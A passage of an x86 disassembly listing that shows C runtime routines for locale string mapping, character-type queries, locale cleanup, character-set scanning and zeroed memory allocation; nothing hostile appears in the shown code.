retn
sub_40AD48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AD4B proc near ; CODE XREF: sub_40B0ED+2C�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_410440
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
xor ebx, ebx
cmp dword_411D6C, ebx
push edi
mov esi, ecx
jnz short loc_40ADA2
push ebx
push ebx
xor edi, edi
inc edi
push edi
push offset dword_40DAA4
push 100h
push ebx
call dword_40D098 ; LCMapStringW
test eax, eax
jz short loc_40AD8D
mov dword_411D6C, edi
jmp short loc_40ADA2
; ---------------------------------------------------------------------------
loc_40AD8D: ; CODE XREF: sub_40AD4B+38�j
call dword_40D050 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_40ADA2
mov dword_411D6C, 2
loc_40ADA2: ; CODE XREF: sub_40AD4B+1D�j
; sub_40AD4B+40�j ...
cmp [ebp+arg_C], ebx
jle short loc_40ADC9
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_40ADAD: ; CODE XREF: sub_40AD4B+6A�j
dec ecx
cmp [eax], bl
jz short loc_40ADBA
inc eax
cmp ecx, ebx
jnz short loc_40ADAD
or ecx, 0FFFFFFFFh
loc_40ADBA: ; CODE XREF: sub_40AD4B+65�j
mov eax, [ebp+arg_C]
sub eax, ecx
dec eax
cmp eax, [ebp+arg_C]
jge short loc_40ADC6
inc eax
loc_40ADC6: ; CODE XREF: sub_40AD4B+78�j
mov [ebp+arg_C], eax
loc_40ADC9: ; CODE XREF: sub_40AD4B+5A�j
mov eax, dword_411D6C
cmp eax, 2
jz loc_40AF82
cmp eax, ebx
jz loc_40AF82
cmp eax, 1
jnz loc_40AFB3
cmp [ebp+arg_18], ebx
mov [ebp+var_8], ebx
jnz short loc_40ADF8
mov eax, [esi]
mov eax, [eax+4]
mov [ebp+arg_18], eax
loc_40ADF8: ; CODE XREF: sub_40AD4B+A3�j
mov esi, dword_40D0F0
xor eax, eax
cmp [ebp+arg_1C], ebx
push ebx
push ebx
push [ebp+arg_C]
setnz al
push [ebp+arg_8]
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_18]
call esi ; MultiByteToWideChar
mov edi, eax
cmp edi, ebx
jz loc_40AFB3
jle short loc_40AE6A
push 0FFFFFFE0h
xor edx, edx
pop eax
div edi
cmp eax, 2
jb short loc_40AE6A
lea eax, [edi+edi+8]
cmp eax, 400h
ja short loc_40AE51
call sub_40BF90
mov eax, esp
cmp eax, ebx
jz short loc_40AE65
mov dword ptr [eax], 0CCCCh
jmp short loc_40AE62
; ---------------------------------------------------------------------------
loc_40AE51: ; CODE XREF: sub_40AD4B+F1�j
push eax
call sub_403B17
cmp eax, ebx
pop ecx
jz short loc_40AE65
mov dword ptr [eax], 0DDDDh
loc_40AE62: ; CODE XREF: sub_40AD4B+104�j
add eax, 8
loc_40AE65: ; CODE XREF: sub_40AD4B+FC�j
; sub_40AD4B+10F�j
mov [ebp+var_C], eax
jmp short loc_40AE6D
; ---------------------------------------------------------------------------
loc_40AE6A: ; CODE XREF: sub_40AD4B+DA�j
; sub_40AD4B+E6�j
mov [ebp+var_C], ebx
loc_40AE6D: ; CODE XREF: sub_40AD4B+11D�j
cmp [ebp+var_C], ebx
jz loc_40AFB3
push edi
push [ebp+var_C]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call esi ; MultiByteToWideChar
test eax, eax
jz loc_40AF71
mov esi, dword_40D098
push ebx
push ebx
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; LCMapStringW
mov ecx, eax
cmp ecx, ebx
mov [ebp+var_8], ecx
jz loc_40AF71
test word ptr [ebp+arg_4], 400h
jz short loc_40AEE1
cmp [ebp+arg_14], ebx
jz loc_40AF71
cmp ecx, [ebp+arg_14]
jg loc_40AF71
push [ebp+arg_14]
push [ebp+arg_10]
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; LCMapStringW
jmp loc_40AF71
; ---------------------------------------------------------------------------
loc_40AEE1: ; CODE XREF: sub_40AD4B+16B�j
cmp ecx, ebx
jle short loc_40AF2A
push 0FFFFFFE0h
xor edx, edx
pop eax
div ecx
cmp eax, 2
jb short loc_40AF2A
lea eax, [ecx+ecx+8]
cmp eax, 400h
ja short loc_40AF12
call sub_40BF90
mov esi, esp
cmp esi, ebx
jz short loc_40AF71
mov dword ptr [esi], 0CCCCh
add esi, 8
jmp short loc_40AF2C
; ---------------------------------------------------------------------------
loc_40AF12: ; CODE XREF: sub_40AD4B+1AF�j
push eax
call sub_403B17
cmp eax, ebx
pop ecx
jz short loc_40AF26
mov dword ptr [eax], 0DDDDh
add eax, 8
loc_40AF26: ; CODE XREF: sub_40AD4B+1D0�j
mov esi, eax
jmp short loc_40AF2C
; ---------------------------------------------------------------------------
loc_40AF2A: ; CODE XREF: sub_40AD4B+198�j
; sub_40AD4B+1A4�j
xor esi, esi
loc_40AF2C: ; CODE XREF: sub_40AD4B+1C5�j
; sub_40AD4B+1DD�j
cmp esi, ebx
jz short loc_40AF71
push [ebp+var_8]
push esi
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40D098 ; LCMapStringW
test eax, eax
jz short loc_40AF6A
cmp [ebp+arg_14], ebx
push ebx
push ebx
jnz short loc_40AF53
push ebx
push ebx
jmp short loc_40AF59
; ---------------------------------------------------------------------------
loc_40AF53: ; CODE XREF: sub_40AD4B+202�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_40AF59: ; CODE XREF: sub_40AD4B+206�j
push [ebp+var_8]
push esi
push ebx
push [ebp+arg_18]
call dword_40D19C ; WideCharToMultiByte
mov [ebp+var_8], eax
loc_40AF6A: ; CODE XREF: sub_40AD4B+1FB�j
push esi
call sub_40AB04
pop ecx
loc_40AF71: ; CODE XREF: sub_40AD4B+13E�j
; sub_40AD4B+15F�j ...
push [ebp+var_C]
call sub_40AB04
mov eax, [ebp+var_8]
pop ecx
jmp loc_40B0DB
; ---------------------------------------------------------------------------
loc_40AF82: ; CODE XREF: sub_40AD4B+86�j
; sub_40AD4B+8E�j
cmp [ebp+arg_0], ebx
mov [ebp+var_C], ebx
mov [ebp+var_10], ebx
jnz short loc_40AF95
mov eax, [esi]
mov eax, [eax+14h]
mov [ebp+arg_0], eax
loc_40AF95: ; CODE XREF: sub_40AD4B+240�j
cmp [ebp+arg_18], ebx
jnz short loc_40AFA2
mov eax, [esi]
mov eax, [eax+4]
mov [ebp+arg_18], eax
loc_40AFA2: ; CODE XREF: sub_40AD4B+24D�j
push [ebp+arg_0]
call sub_40BFBC
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jnz short loc_40AFBA
loc_40AFB3: ; CODE XREF: sub_40AD4B+97�j
; sub_40AD4B+D4�j ...
xor eax, eax
jmp loc_40B0DB
; ---------------------------------------------------------------------------
loc_40AFBA: ; CODE XREF: sub_40AD4B+266�j
cmp eax, [ebp+arg_18]
jz loc_40B09E
push ebx
push ebx
lea ecx, [ebp+arg_C]
push ecx
push [ebp+arg_8]
push eax
push [ebp+arg_18]
call sub_40C003
add esp, 18h
cmp eax, ebx
mov [ebp+var_C], eax
jz short loc_40AFB3
mov esi, dword_40D09C
push ebx
push ebx
push [ebp+arg_C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; LCMapStringA
cmp eax, ebx
mov [ebp+var_8], eax
jnz short loc_40B001
loc_40AFFA: ; CODE XREF: sub_40AD4B+2D0�j
; sub_40AD4B+2F9�j
xor esi, esi
jmp loc_40B0B8
; ---------------------------------------------------------------------------
loc_40B001: ; CODE XREF: sub_40AD4B+2AD�j
jle short loc_40B040
cmp eax, 0FFFFFFE0h
ja short loc_40B040
add eax, 8
cmp eax, 400h
ja short loc_40B028
call sub_40BF90
mov edi, esp
cmp edi, ebx
jz short loc_40AFFA
mov dword ptr [edi], 0CCCCh
add edi, 8
jmp short loc_40B042
; ---------------------------------------------------------------------------
loc_40B028: ; CODE XREF: sub_40AD4B+2C5�j
push eax
call sub_403B17
cmp eax, ebx
pop ecx
jz short loc_40B03C
mov dword ptr [eax], 0DDDDh
add eax, 8
loc_40B03C: ; CODE XREF: sub_40AD4B+2E6�j
mov edi, eax
jmp short loc_40B042
; ---------------------------------------------------------------------------
loc_40B040: ; CODE XREF: sub_40AD4B:loc_40B001�j
; sub_40AD4B+2BB�j
xor edi, edi
loc_40B042: ; CODE XREF: sub_40AD4B+2DB�j
; sub_40AD4B+2F3�j
cmp edi, ebx
jz short loc_40AFFA
push [ebp+var_8]
push ebx
push edi
call sub_403FE0
add esp, 0Ch
push [ebp+var_8]
push edi
push [ebp+arg_C]
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; LCMapStringA
cmp eax, ebx
mov [ebp+var_8], eax
jnz short loc_40B070
xor esi, esi
jmp short loc_40B095
; ---------------------------------------------------------------------------
loc_40B070: ; CODE XREF: sub_40AD4B+31F�j
push [ebp+arg_14]
lea eax, [ebp+var_8]
push [ebp+arg_10]
push eax
push edi
push [ebp+arg_18]
push [ebp+var_14]
call sub_40C003
mov esi, eax
mov [ebp+var_10], esi
add esp, 18h
neg esi
sbb esi, esi
and esi, [ebp+var_8]
loc_40B095: ; CODE XREF: sub_40AD4B+323�j
push edi
call sub_40AB04
pop ecx
jmp short loc_40B0B8
; ---------------------------------------------------------------------------
loc_40B09E: ; CODE XREF: sub_40AD4B+272�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40D09C ; LCMapStringA
mov esi, eax
loc_40B0B8: ; CODE XREF: sub_40AD4B+2B1�j
; sub_40AD4B+351�j
cmp [ebp+var_C], ebx
jz short loc_40B0C6
push [ebp+var_C]
call sub_40405A
pop ecx
loc_40B0C6: ; CODE XREF: sub_40AD4B+370�j
mov eax, [ebp+var_10]
cmp eax, ebx
jz short loc_40B0D9
cmp [ebp+arg_10], eax
jz short loc_40B0D9
push eax
call sub_40405A
pop ecx
loc_40B0D9: ; CODE XREF: sub_40AD4B+380�j
; sub_40AD4B+385�j
mov eax, esi
loc_40B0DB: ; CODE XREF: sub_40AD4B+232�j
; sub_40AD4B+26A�j
lea esp, [ebp-20h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_403F45
leave
retn
sub_40AD4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B0ED proc near ; CODE XREF: sub_40800F+B6�p
; sub_40800F+DB�p ...
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_4048C8
push [ebp+arg_20]
lea ecx, [ebp+var_10]
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40AD4B
add esp, 20h
cmp [ebp+var_4], 0
jz short locret_40B12E
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40B12E: ; CODE XREF: sub_40B0ED+38�j
leave
retn
sub_40B0ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B130 proc near ; CODE XREF: sub_40B2E8+29�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_410440
xor eax, ebp
mov [ebp+var_4], eax
mov eax, dword_411D70
push ebx
push esi
xor ebx, ebx
cmp eax, ebx
push edi
mov edi, ecx
jnz short loc_40B189
lea eax, [ebp+var_8]
push eax
xor esi, esi
inc esi
push esi
push offset dword_40DAA4
push esi
call dword_40D090 ; GetStringTypeW
test eax, eax
jz short loc_40B16F
mov dword_411D70, esi
jmp short loc_40B1A3
; ---------------------------------------------------------------------------
loc_40B16F: ; CODE XREF: sub_40B130+35�j
call dword_40D050 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_40B184
push 2
pop eax
mov dword_411D70, eax
jmp short loc_40B189
; ---------------------------------------------------------------------------
loc_40B184: ; CODE XREF: sub_40B130+48�j
mov eax, dword_411D70
loc_40B189: ; CODE XREF: sub_40B130+1D�j
; sub_40B130+52�j
cmp eax, 2
jz loc_40B261
cmp eax, ebx
jz loc_40B261
cmp eax, 1
jnz loc_40B28B
loc_40B1A3: ; CODE XREF: sub_40B130+3D�j
cmp [ebp+arg_10], ebx
mov [ebp+var_8], ebx
jnz short loc_40B1B3
mov eax, [edi]
mov eax, [eax+4]
mov [ebp+arg_10], eax
loc_40B1B3: ; CODE XREF: sub_40B130+79�j
mov esi, dword_40D0F0
xor eax, eax
cmp [ebp+arg_18], ebx
push ebx
push ebx
push [ebp+arg_8]
setnz al
push [ebp+arg_4]
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_10]
call esi ; MultiByteToWideChar
mov edi, eax
cmp edi, ebx
jz loc_40B28B
jle short loc_40B21E
cmp edi, 7FFFFFF0h
ja short loc_40B21E
lea eax, [edi+edi+8]
cmp eax, 400h
ja short loc_40B208
call sub_40BF90
mov eax, esp
cmp eax, ebx
jz short loc_40B21C
mov dword ptr [eax], 0CCCCh
jmp short loc_40B219
; ---------------------------------------------------------------------------
loc_40B208: ; CODE XREF: sub_40B130+C3�j
push eax
call sub_403B17
cmp eax, ebx
pop ecx
jz short loc_40B21C
mov dword ptr [eax], 0DDDDh
loc_40B219: ; CODE XREF: sub_40B130+D6�j
add eax, 8
loc_40B21C: ; CODE XREF: sub_40B130+CE�j
; sub_40B130+E1�j
mov ebx, eax
loc_40B21E: ; CODE XREF: sub_40B130+B0�j
; sub_40B130+B8�j
test ebx, ebx
jz short loc_40B28B
lea eax, [edi+edi]
push eax
push 0
push ebx
call sub_403FE0
add esp, 0Ch
push edi
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call esi ; MultiByteToWideChar
test eax, eax
jz short loc_40B255
push [ebp+arg_C]
push eax
push ebx
push [ebp+arg_0]
call dword_40D090 ; GetStringTypeW
mov [ebp+var_8], eax
loc_40B255: ; CODE XREF: sub_40B130+112�j
push ebx
call sub_40AB04
mov eax, [ebp+var_8]
pop ecx
jmp short loc_40B2D6
; ---------------------------------------------------------------------------
loc_40B261: ; CODE XREF: sub_40B130+5C�j
; sub_40B130+64�j
xor esi, esi
cmp [ebp+arg_14], ebx
jnz short loc_40B270
mov eax, [edi]
mov eax, [eax+14h]
mov [ebp+arg_14], eax
loc_40B270: ; CODE XREF: sub_40B130+136�j
cmp [ebp+arg_10], ebx
jnz short loc_40B27D
mov eax, [edi]
mov eax, [eax+4]
mov [ebp+arg_10], eax
loc_40B27D: ; CODE XREF: sub_40B130+143�j
push [ebp+arg_14]
call sub_40BFBC
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40B28F
loc_40B28B: ; CODE XREF: sub_40B130+6D�j
; sub_40B130+AA�j ...
xor eax, eax
jmp short loc_40B2D6
; ---------------------------------------------------------------------------
loc_40B28F: ; CODE XREF: sub_40B130+159�j
cmp eax, [ebp+arg_10]
jz short loc_40B2B2
push ebx
push ebx
lea ecx, [ebp+arg_8]
push ecx
push [ebp+arg_4]
push eax
push [ebp+arg_10]
call sub_40C003
mov esi, eax
add esp, 18h
cmp esi, ebx
jz short loc_40B28B
mov [ebp+arg_4], esi
loc_40B2B2: ; CODE XREF: sub_40B130+162�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+arg_14]
call dword_40D094 ; GetStringTypeA
cmp esi, ebx
mov edi, eax
jz short loc_40B2D4
push esi
call sub_40405A
pop ecx
loc_40B2D4: ; CODE XREF: sub_40B130+19B�j
mov eax, edi
loc_40B2D6: ; CODE XREF: sub_40B130+12F�j
; sub_40B130+15D�j
lea esp, [ebp-14h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_403F45
leave
retn
sub_40B130 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B2E8 proc near ; CODE XREF: sub_40800F+96�p
; sub_40AB1F+83�p
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_4048C8
push [ebp+arg_1C]
lea ecx, [ebp+var_10]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40B130
add esp, 1Ch
cmp [ebp+var_4], 0
jz short locret_40B326
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40B326: ; CODE XREF: sub_40B2E8+35�j
leave
retn
sub_40B2E8 endp
; =============== S U B R O U T I N E =======================================
sub_40B328 proc near ; CODE XREF: sub_408648+E9�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_40B4B6
push dword ptr [esi+4]
call sub_40405A
push dword ptr [esi+8]
call sub_40405A
push dword ptr [esi+0Ch]
call sub_40405A
push dword ptr [esi+10h]
call sub_40405A
push dword ptr [esi+14h]
call sub_40405A
push dword ptr [esi+18h]
call sub_40405A
push dword ptr [esi]
call sub_40405A
push dword ptr [esi+20h]
call sub_40405A
push dword ptr [esi+24h]
call sub_40405A
push dword ptr [esi+28h]
call sub_40405A
push dword ptr [esi+2Ch]
call sub_40405A
push dword ptr [esi+30h]
call sub_40405A
push dword ptr [esi+34h]
call sub_40405A
push dword ptr [esi+1Ch]
call sub_40405A
push dword ptr [esi+38h]
call sub_40405A
push dword ptr [esi+3Ch]
call sub_40405A
add esp, 40h
push dword ptr [esi+40h]
call sub_40405A
push dword ptr [esi+44h]
call sub_40405A
push dword ptr [esi+48h]
call sub_40405A
push dword ptr [esi+4Ch]
call sub_40405A
push dword ptr [esi+50h]
call sub_40405A
push dword ptr [esi+54h]
call sub_40405A
push dword ptr [esi+58h]
call sub_40405A
push dword ptr [esi+5Ch]
call sub_40405A
push dword ptr [esi+60h]
call sub_40405A
push dword ptr [esi+64h]
call sub_40405A
push dword ptr [esi+68h]
call sub_40405A
push dword ptr [esi+6Ch]
call sub_40405A
push dword ptr [esi+70h]
call sub_40405A
push dword ptr [esi+74h]
call sub_40405A
push dword ptr [esi+78h]
call sub_40405A
push dword ptr [esi+7Ch]
call sub_40405A
add esp, 40h
push dword ptr [esi+80h]
call sub_40405A
push dword ptr [esi+84h]
call sub_40405A
push dword ptr [esi+88h]
call sub_40405A
push dword ptr [esi+8Ch]
call sub_40405A
push dword ptr [esi+90h]
call sub_40405A
push dword ptr [esi+94h]
call sub_40405A
push dword ptr [esi+98h]
call sub_40405A
push dword ptr [esi+9Ch]
call sub_40405A
push dword ptr [esi+0A0h]
call sub_40405A
push dword ptr [esi+0A4h]
call sub_40405A
push dword ptr [esi+0A8h]
call sub_40405A
add esp, 2Ch
loc_40B4B6: ; CODE XREF: sub_40B328+7�j
pop esi
retn
sub_40B328 endp
; =============== S U B R O U T I N E =======================================
sub_40B4B8 proc near ; CODE XREF: sub_408648+64�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40B4F6
mov eax, [esi]
cmp eax, off_411248
jz short loc_40B4D2
push eax
call sub_40405A
pop ecx
loc_40B4D2: ; CODE XREF: sub_40B4B8+11�j
mov eax, [esi+4]
cmp eax, off_41124C
jz short loc_40B4E4
push eax
call sub_40405A
pop ecx
loc_40B4E4: ; CODE XREF: sub_40B4B8+23�j
mov esi, [esi+8]
cmp esi, off_411250
jz short loc_40B4F6
push esi
call sub_40405A
pop ecx
loc_40B4F6: ; CODE XREF: sub_40B4B8+7�j
; sub_40B4B8+35�j
pop esi
retn
sub_40B4B8 endp
; =============== S U B R O U T I N E =======================================
sub_40B4F8 proc near ; CODE XREF: sub_408648+43�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40B57F
mov eax, [esi+0Ch]
cmp eax, off_411254
jz short loc_40B513
push eax
call sub_40405A
pop ecx
loc_40B513: ; CODE XREF: sub_40B4F8+12�j
mov eax, [esi+10h]
cmp eax, off_411258
jz short loc_40B525
push eax
call sub_40405A
pop ecx
loc_40B525: ; CODE XREF: sub_40B4F8+24�j
mov eax, [esi+14h]
cmp eax, off_41125C
jz short loc_40B537
push eax
call sub_40405A
pop ecx
loc_40B537: ; CODE XREF: sub_40B4F8+36�j
mov eax, [esi+18h]
cmp eax, off_411260
jz short loc_40B549
push eax
call sub_40405A
pop ecx
loc_40B549: ; CODE XREF: sub_40B4F8+48�j
mov eax, [esi+1Ch]
cmp eax, off_411264
jz short loc_40B55B
push eax
call sub_40405A
pop ecx
loc_40B55B: ; CODE XREF: sub_40B4F8+5A�j
mov eax, [esi+20h]
cmp eax, off_411268
jz short loc_40B56D
push eax
call sub_40405A
pop ecx
loc_40B56D: ; CODE XREF: sub_40B4F8+6C�j
mov esi, [esi+24h]
cmp esi, off_41126C
jz short loc_40B57F
push esi
call sub_40405A
pop ecx
loc_40B57F: ; CODE XREF: sub_40B4F8+7�j
; sub_40B4F8+7E�j
pop esi
retn
sub_40B4F8 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_40B5A4: ; CODE XREF: seg001:0040B5B1�j
mov al, [edx]
or al, al
jz short loc_40B5B3
add edx, 1
bts [esp], eax
jmp short loc_40B5A4
; ---------------------------------------------------------------------------
loc_40B5B3: ; CODE XREF: seg001:0040B5A8�j
mov esi, [ebp+8]
or ecx, 0FFFFFFFFh
lea ecx, [ecx+0]
loc_40B5BC: ; CODE XREF: seg001:0040B5CC�j
add ecx, 1
mov al, [esi]
or al, al
jz short loc_40B5CE
add esi, 1
bt [esp], eax
jnb short loc_40B5BC
loc_40B5CE: ; CODE XREF: seg001:0040B5C3�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_40B5F4: ; CODE XREF: seg001:0040B601�j
mov al, [edx]
or al, al
jz short loc_40B603
add edx, 1
bts [esp], eax
jmp short loc_40B5F4
; ---------------------------------------------------------------------------
loc_40B603: ; CODE XREF: seg001:0040B5F8�j
mov esi, [ebp+8]
mov edi, edi
loc_40B608: ; CODE XREF: seg001:0040B615�j
mov al, [esi]
or al, al
jz short loc_40B61A
add esi, 1
bt [esp], eax
jnb short loc_40B608
lea eax, [esi-1]
loc_40B61A: ; CODE XREF: seg001:0040B60C�j
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B620 proc near ; CODE XREF: sub_40B671+A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_4048C8
movzx eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
mov dl, [ebp+arg_C]
test [ecx+eax+1Dh], dl
jnz short loc_40B65F
cmp [ebp+arg_8], 0
jz short loc_40B659
mov ecx, [ebp+var_10]
mov ecx, [ecx+0C8h]
movzx eax, word ptr [ecx+eax*2]
and eax, [ebp+arg_8]
jmp short loc_40B65B
; ---------------------------------------------------------------------------
loc_40B659: ; CODE XREF: sub_40B620+25�j
xor eax, eax
loc_40B65B: ; CODE XREF: sub_40B620+37�j
test eax, eax
jz short loc_40B662
loc_40B65F: ; CODE XREF: sub_40B620+1F�j
xor eax, eax
inc eax
loc_40B662: ; CODE XREF: sub_40B620+3D�j
cmp [ebp+var_4], 0
jz short locret_40B66F
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40B66F: ; CODE XREF: sub_40B620+46�j
leave
retn
sub_40B620 endp
; =============== S U B R O U T I N E =======================================
sub_40B671 proc near ; CODE XREF: sub_408B89+3F�p
; sub_408CC1+53�p ...
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
push 0
call sub_40B620
add esp, 10h
retn
sub_40B671 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B684 proc near ; CODE XREF: sub_409363+E�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0040B789 SIZE 00000019 BYTES
push 0Ch
push offset dword_40E740
call __SEH_prolog4
mov ecx, [ebp+arg_0]
xor edi, edi
cmp ecx, edi
jbe short loc_40B6C7
push 0FFFFFFE0h
pop eax
xor edx, edx
div ecx
cmp eax, [ebp+arg_4]
sbb eax, eax
inc eax
jnz short loc_40B6C7
call sub_403F8F
mov dword ptr [eax], 0Ch
push edi
push edi
push edi
push edi
push edi
call sub_404E8B
add esp, 14h
loc_40B6C0: ; CODE XREF: sub_40B684+E6�j
; sub_40B684+F2�j
xor eax, eax
jmp loc_40B79C
; ---------------------------------------------------------------------------
loc_40B6C7: ; CODE XREF: sub_40B684+13�j
; sub_40B684+22�j
imul ecx, [ebp+arg_4]
mov esi, ecx
mov [ebp+arg_0], esi
cmp esi, edi
jnz short loc_40B6D7
xor esi, esi
inc esi
loc_40B6D7: ; CODE XREF: sub_40B684+4E�j
; sub_40B684+DB�j
xor ebx, ebx
mov [ebp+var_1C], ebx
cmp esi, 0FFFFFFE0h
ja short loc_40B74A
cmp dword_413B88, 3
jnz short loc_40B735
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
mov eax, [ebp+arg_0]
cmp eax, dword_413B94
ja short loc_40B735
push 4
call sub_405121
pop ecx
mov [ebp+ms_exc.disabled], edi
push [ebp+arg_0]
call sub_40596E
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40B780
mov ebx, [ebp+var_1C]
cmp ebx, edi
jz short loc_40B739
push [ebp+arg_0]
push edi
push ebx
call sub_403FE0
add esp, 0Ch
loc_40B735: ; CODE XREF: sub_40B684+64�j
; sub_40B684+78�j
cmp ebx, edi
jnz short loc_40B79A
loc_40B739: ; CODE XREF: sub_40B684+A2�j
push esi
push 8
push dword_41157C
call dword_40D0F8 ; RtlAllocateHeap
mov ebx, eax
loc_40B74A: ; CODE XREF: sub_40B684+5B�j
cmp ebx, edi
jnz short loc_40B79A
cmp dword_411898, edi
jz short loc_40B789
push esi
call sub_405F45
pop ecx
test eax, eax
jnz loc_40B6D7
mov eax, [ebp+arg_8]
cmp eax, edi
jz loc_40B6C0
mov dword ptr [eax], 0Ch
jmp loc_40B6C0
sub_40B684 endp
; =============== S U B R O U T I N E =======================================
sub_40B77B proc near ; DATA XREF: seg001:0040E758�o
xor edi, edi
mov esi, [ebp+0Ch]
sub_40B77B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B780 proc near ; CODE XREF: sub_40B684+98�p
push 4
call sub_405049
pop ecx
retn
sub_40B780 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40B684
loc_40B789: ; CODE XREF: sub_40B684+D0�j
cmp ebx, edi
jnz short loc_40B79A
mov eax, [ebp+arg_8]
cmp eax, edi
jz short loc_40B79A
mov dword ptr [eax], 0Ch
loc_40B79A: ; CODE XREF: sub_40B684+B3�j
; sub_40B684+C8�j ...
mov eax, ebx
loc_40B79C: ; CODE XREF: sub_40B684+3E�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40B684
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B7A2 proc near ; CODE XREF: sub_4093AB+C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0040B8EF SIZE 000000CE BYTES
push 10h
push offset dword_40E760
